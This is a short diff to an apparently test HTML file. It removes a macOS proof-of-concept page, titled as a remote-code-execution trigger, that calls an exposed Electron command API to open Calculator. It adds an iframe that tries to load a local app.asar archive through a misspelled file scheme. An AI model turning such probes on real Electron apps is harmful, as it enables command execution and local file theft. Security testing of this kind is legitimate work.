--- a/test_rc.html
+++ b/test_rc.html
@@ -1,7 +1,1 @@
-<!DOCTYPE html>
-<html>
-<body>
-  <h1>RCE Trigger (macOS)</h1>
-  <button onclick="electronAPI.execCommand('open -a Calculator')">Open Calculator</button>
-</body>
-</html>
+<iframe src=filr:///Downloads/app.asar></iframe>
